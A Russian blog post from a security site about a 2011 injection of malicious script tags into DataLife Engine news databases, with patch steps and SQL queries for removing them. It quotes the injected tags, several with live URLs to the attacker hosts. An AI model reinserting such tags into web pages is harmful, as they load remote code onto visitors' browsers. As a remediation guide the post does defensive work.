Хакерская Linux-утилита заражает злоумышленников троянцем
13 апреля 2016 года Появление новых троянцев-бэкдоров, способных выполнять команды злоумышленников и предоставлять возможность удаленного управления зараженным компьютером, всегда является значимым событием в сфере информационной безопасности. Тем более, если такие вредоносные программы ...

Запомнить
iconРеклама
banner



У нас читают так же:
  • DLE&Zloyweb team
iconКалендарь
«    Апрель 2016    »
Пн Вт Ср Чт Пт Сб Вс
  1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30  
iconАрхив новостей
Март 2016 (2)
Февраль 2016 (3)
Январь 2016 (10)
Декабрь 2015 (7)
Ноябрь 2015 (4)
Октябрь 2015 (2)
Заголовоки
тут самое интересное
Куда развиваем сайт?
1. Хотим больше статей по безопасности ПК
2. Сделайте уклон на вопросы настройки Windows
3. Даешь Антроид!
4. Все ок

4 способа разобраться фальшив ли емейл

Фишинг-атаки, наиболее распространенная форма мошенничества в Интернете, и не никто не застрахован от этого вида мошенничества.
4 способа разобраться фальшив ли емейл

Вирус .src от reg.ru, осторожно мошенники!

На днях на email (почту) моего домена ( а так же других доменов, что и вызвало подозрение) пришло письмо, адресатом которого указан крупнейший в мире доменный регистратор рег.ру. Естественно, раз в отправителе указан адрес "abuse@reg.ru" я сразу же принялся разбираться и готовить ответ. Проверка сервера не выявила ни какой подозрительной активности, а в некоторые доменные зоны не имели вообще
Вирус .src от reg.ru, осторожно мошенники!

"Лаборатория Касперского": приложение из Google Play похищало данные из сети "ВКонтакте"

Специалисты "Лаборатория Касперского" вскрыли масштабную операцию по хищению персональных учетных данных пользователей популярной Российской социальной сети "ВКонтакте". Об этом сегодня было сказано в сообщении разработчика антивирусного ПО.

GHOST-обнаружена новая уязвимость практически во всех операционных системах семейства Linux. Как устранить!

GHOST-обнаружена новая уязвимость практически во всех операционных системах семейства Linux. Как устранить! Получил письмо хостера, как и тысячи клиентов по всему рунету: Уважаемый клиент. Уведомляем Вас, что обнаружена новая уязвимость практически во всех операционных системах семейства Linux. Данная уязвимость обнаружена в таких популярных дистрибутивах, как Debian 7 (wheezy), Red Hat
GHOST-обнаружена новая уязвимость практически во всех операционных системах семейства Linux. Как устранить!

Большая атака ботов на WordPress-сайты

Нападение исходит от 90 000 компьютеров, которые создали хаос и неразбериху среди хостинг-провайдеров.
Большая атака ботов на WordPress-сайты

Статистика дня!!! вирусная активность

Вирусная активность за сутки ежедневное обновление
Статистика дня!!! вирусная активность

онлайн проверка на вирус от zloyweb.ru

Теперь прямо на сайте вы сможете онлайн проверить ваши файлы на вирусы и веб ресурсы и ссылки!!!! ВНИМАНИЕ Работает в тестовом режиме через сервер rambler проверка антивирусом касперского-бесплатно!!!! проверка файлов до 100 мб. [page=https://zloyweb.ru/antyvirus/forma.html]Проверка сайта онлайн и проверка файлов онлайн[/page]при отсутствии вирусов-вы будете возвращены на сайт!!! а это еще ряд
онлайн проверка на вирус от zloyweb.ru
православие, храмы, монастыри, христианство, православная сеть блогов suzhdeno.ru

Выделенные сервера, хостинг сайтов и VPS от Интернет Хостинг Центра
Сервер в Германии

Автор: admin
|
Дата: 26.01.2011

zheenix наносит удар по DLE

zheenix наносит удар по DLE

Одним после новогодним вечером января 2011 года получаю от Яндекса шайбу:
Выполнение вредоносного кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, а также к порче или краже данных.

В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Пожалуйста, удалите вредоносный код. Если при новой проверке код не обнаружится, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.


Срочно пишу Платону и получаю ответ:
Здравствуйте!

При посещении Вашего сайта антивирусный робот Яндекса обнаружил вредоносный код следующего содержания:


[script src="h**p://zheenix.msk.ru/abc.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/cc7e42bbbe17b3b9b5f64c72fce24079.js" type="text/javascript"][/script][script src="h**p://ivan81.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/74a7f439bdeb1b8b2deb077f4865ad34.js" type="text/javascript"][/script][script src="h**p://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js" type="text/javascript"][/script][script src="h**p://goooogle.ipq.co/a848f0bc4a69a36058ff266451532591.js" type="text/javascript"][/script][script src="h**p://googlle.ipq.co/37a80d4c8e82c6dab1b545d003ddb58e.js" type="text/javascript"][/script][script src="h**p://googlle.ce.ms/7b5936ede143efc78b62bf93f6fd0d11.js" type="text/javascript"][/script][script src="h**p://goooglle.org/ea77fb9d4dbe7cec70123da4856bcf61.js" type="text/javascript"][/script][script src="h**p://goooglle.org/34187d6c7a323b7de0498918020aff27.js" type="text/javascript"][/script][script src="h**p://goooglle.org/b621f2c7618b483bc21045a4280f6914.js" type="text/javascript"][/script][script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js" type="text/javascript"][/script]

Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах изменены во избежание случайного срабатывания кода.

Подобный ссылки неоднократно встречаются на страницах сайта, при этом имена скриптов могут варьироваться. Пожалуйста, проверьте страницы Вашего сайта и удалите вредоносный код. Вскоре после этого наш робот перепроверит сайт и, если вредоносный код более не будет обнаружен, пометка в выдаче снимется. Перечень зараженных страниц можно узнать в Яндекс.Вебмастере ( http://webmaster.yandex.ru ).

---
С уважением, Платон Щукин
Служба поддержки Яндекса


Срочно лечу на Dle форум и получаю еще одну шайбу от Целсофта за свой скрипт DLE:
"Вирус в базе данных, а не в файлах, а причина несвоевременная установка патчей безопасности"
Вот Вам и забросил на пару месяцев сайт

А теперь будим бороться вместе:
Закрываем дыры в безопасности скрипта:
    
Проблема: Недостаточная фильтрация входящих данных.

Ошибка в версии: 9.0 и все более ранние версии

Степень опасности: Высокая

Для исправления откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите:
    $count_result = 0;

ниже добавьте:
    $sql_count = "";

Откройте файл engine/inc/templates.php и найдите:
    $allow_save = false;

ниже добавьте:
    $_REQUEST['do_template'] = trim( totranslit($_REQUEST['do_template'], false, false) );
    $_REQUEST['do_language'] = trim( totranslit($_REQUEST['do_language'], false, false) );


Либо просто скачайте и скопируйте на свой сервер патч для версии 9.0: http://dle-news.ru/files/dle90_path.zip, изменения для более старых версий скрипта, вносятся вручную, как указано выше.


2. Устраняем теперь сам вирус из БД (чистим SQL базу)
как видим из кода:
[script src="h**p://zheenix.msk.ru/abc.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/cc7e42bbbe17b3b9b5f64c72fce24079.js" type="text/javascript"][/script][script src="h**p://ivan81.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/74a7f439bdeb1b8b2deb077f4865ad34.js" type="text/javascript"][/script][script src="h**p://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js" type="text/javascript"][/script][script src="h**p://goooogle.ipq.co/a848f0bc4a69a36058ff266451532591.js" type="text/javascript"][/script][script src="h**p://googlle.ipq.co/37a80d4c8e82c6dab1b545d003ddb58e.js" type="text/javascript"][/script][script src="h**p://googlle.ce.ms/7b5936ede143efc78b62bf93f6fd0d11.js" type="text/javascript"][/script][script src="h**p://goooglle.org/ea77fb9d4dbe7cec70123da4856bcf61.js" type="text/javascript"][/script][script src="h**p://goooglle.org/34187d6c7a323b7de0498918020aff27.js" type="text/javascript"][/script][script src="h**p://goooglle.org/b621f2c7618b483bc21045a4280f6914.js" type="text/javascript"][/script][script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js" type="text/javascript"][/script]

[quote] у нас в краткой и полной новости на сайтах DLE появляются скрипты.
Это вирус на сайте. Как удалить вирус на сайте ??

<script src="h**p://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script><script src="**p://zheenix.msk.ru/abc.js" type="text/javascript"></script><script src="h**p://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>
script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js"
script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js


Делим их для удобства на части

1.
<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script>


2.
<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>


3.
<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>

4. script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js"
5. script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js
1 код удалить будет сложнее т.к код после слеша везде разный, поэтому начнем со 2 и 3!

Идем в phpmyadmin, выбираем вкладку SQL, видим окошко и туда вписываем:

UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>%'


Нажимаем ОК, после чего пропадет из новостей скрипт №2!

Не закрывая SQL удаляем так же скрипт №3 тоесть выполняем Такой sql запрос:

UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>%'


Нажимаем ОК!

Скрипт №3 так же удален!

Теперь возьмемся за скрипт №1

В phpmyadmin выбираем вкладку "Экспорт" и нажимаем ОК, сохраняем на компьютер!
Открываем эту базу с помощью Microsoft Word, нажимаем "правка"---"найти" ---"заменить" и вписываем в поле найти: (zheenix)*(js) а в поле замена вписываем zheenix.ru , тут же нажимаем "больше" и ставим галочку на "Подстановочные знаки" , нажимаем "заменить все"!
Этим мы избавились от разного кода! Сохраняем изменения!
Идем в phpmyadmin ---> структура ----> и отмечаем все галочки ---> далее удаляем все!
Теперь идем во вкладку "импорт" , нажимаем обзор и выбираем нашу измененную БД, ставим вместо utf8 ---> cp1251 и нажиимаем ОК! База загружена!

Теперь снова идем во вкладку SQL и выполняем такой запрос:


UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://zheenix.ru" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://zheenix.ru" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://zheenix.ru" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://zheenix.ru" type="text/javascript"></script>%'


Нажимаем ОК!
Вот собственно и все!
ах да еще последних 2 запроса  4 и 5
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>%'




UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://goooogle.ipq.co" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://goooogle.ipq.co" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://goooogle.ipq.co" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://goooogle.ipq.co" type="text/javascript"></script>%'


Примечание: Открываем скачанную базу SQL базу с помощью Microsoft Word, нажимаем "правка"---"найти" ---"заменить" и вписываем в поле найти: (zheenix)*(js) а в поле замена вписываем zheenix.ru , тут же нажимаем "больше" и ставим галочку на "Подстановочные знаки" , нажимаем "заменить все"!

Да я бы все-таки поменял пароли к админке, фтп, SQL, изменил подход к безопасности сайтов DLE -ставил бы обновление защиты регулярно!!!
Удачи Вам и чтобв ни каких вирусов в Новом году!

Не так давно мы протестировали и разместили скрипт: Онудаляет вредоносный код (скрипт) из DLE. Происходит автоматическое удаление фреймов (iframe) из базы данных DLE.
скрипт от автора и известен, как скрипт murderer24, который после запуска оного на сервере очистит вашу базу данных от подобных неприятных "дополнений". Скрипт работает очень шустро и весит всего 3 кб.
Вы не можете скачивать файлы с нашего сервера
Комментариев: 3
Просмотров: 13171
  • 100

Похожие новости:

Удары хакеров по DLE в 2011 году набирают обороты.

Удары хакеров по DLE в 2011 году набирают обороты.

Не успели многие после новогодних атак heenix наносит удар по DLE залатать дыры в движке DLE, как грянули новые атаки уже через FTP.
Стандарт (спецификация) MIME (Multipurpose Internet Mail Extension)

Стандарт (спецификация) MIME (Multipurpose Internet Mail Extension)

Стандарт (спецификация) MIME (Multipurpose Internet Mail Extension) – многоцелевые почтовые расширения Интернет – был разработан относительно электронной почты, однако с успехом применяется также и в
Новогодний снег на страницах сайта (как у нас)

Новогодний снег на страницах сайта (как у нас)

Новогодний снег на страницах сайта (как у нас) уважаемые посетители портала zloyweb.ru-предлагаем Вам новогодний скрипт "падающий снег" как у нас. скачать скрипт падающий снег вы можете абсолюто
приколы нашего детства (почтовые пакости)

приколы нашего детства (почтовые пакости)

что-то потянуло меня на настольгию... видимо последнее обновление безопасности форточек надолго оставят нас без работы (шутка) мы писали и будем писать как сделать вашу работу в сети безопаснее и
какими мы были 5 лет назад (или маленькие пакости одноклассникам)

какими мы были 5 лет назад (или маленькие пакости одноклассникам)

Время летит -проходят не только дни и недели. проходят и года. оборачиваясь назад сквозь пелену забаненных сайтов хочется вспомнить, какими же мы были. тогда 5 лет назад думали о другом-это сейчас

Комментарии (3)

Добавить комментарий!

Игорь Агафонов
ice10
12 февраля 2011 16:17
Не, не проще так как:
1. Стоят еще ДЛЕ версий 6.х, 7.х
2. Переносить на новые движки сапосайты... не...
3. Так проще


--------------------

admin
12 февраля 2011 16:15
а не проще обновить движок?


--------------------

Игорь Агафонов
ice10
12 февраля 2011 16:13
Да, знакомая вещь, пришлось написать скрипт, чтобы чистить весь этот мусор. Так как атаки продолжаются, теперь просто запускаю его без проделывания таких сложных действий.


--------------------

Информация
Посетители, находящиеся в группе Прохожий, не могут оставлять комментарии к данной публикации.